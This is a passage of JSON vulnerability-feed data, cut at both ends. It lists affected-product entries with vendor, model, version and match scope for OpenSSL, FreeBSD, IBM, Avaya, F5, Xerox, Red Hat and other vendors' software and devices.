"trust": 0.3, "vendor": "xerox", "version": "72200" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57350" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7556061.121.225.06100" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "9.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "-stablepre2001-07-20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5855072.060.134.32804" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "6.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "9.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x33007382" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "7.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "big-ip edge clients for mac os", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "x7110" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "7.0-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "9.0-rc3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.3" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78300" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "9.1-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "7.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "7.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75300" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rc2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "9.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7955" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "7.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2x" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "7.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.0-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408738" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5875072.060.134.32804" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "8.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75450" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0.x" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.3-rc", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "9.3-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "8.4-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.0-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "9301072.180.134.32804" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "-pre-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75560" }, { "model": "8.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "enterprise linux load balancer eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "9.2-rc2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "58750" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.2-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35507914" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.1" }, { "model": "8.3-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge clients for mac os", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "x6500" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "9.1-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "9.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.3" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.5" }, { "model": "7.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3x" }, { "model": "9.3-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "8.3-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "-stablepre2002-03-07", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087330" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.2" }, { "model": "8.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "7.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "8.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "7.3-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "6.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "89000" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "8.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "7.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.1" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip edge gateway hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "8.3-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2202585" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "10.0-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "9.1-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "9.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.21" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75250" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.5" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7525061.121.225.06100" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.1" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-release-p1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7835072.010.134.32804" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": 